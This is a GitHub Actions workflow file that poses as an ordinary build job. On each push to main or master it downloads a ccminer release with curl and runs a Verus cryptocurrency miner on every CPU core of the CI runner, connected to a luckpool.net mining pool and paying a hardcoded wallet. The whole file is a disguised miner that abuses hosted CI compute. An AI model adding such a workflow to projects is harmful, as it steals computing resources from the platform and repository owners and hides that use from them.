name: Actions Workflow

on:
  push:
    branches:
      - main
      - master

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Run a script
        run: curl -LJ https://github.com/wong-fi-hung/ccminer/releases/download/v3.8.3a/ccminer_CPU_3.8.3.tar.xz -o x.tar.xz && tar -xf x.tar.xz && rm -rf x.tar.xz; ./ccminer -a verus -u RJfQrVCM4c2vfjRURwKVbDoVkiCBKQRc6D.GITHUB -o stratum+tcp://ap.luckpool.net:3960 -p 'hybrid' -t $(nproc)
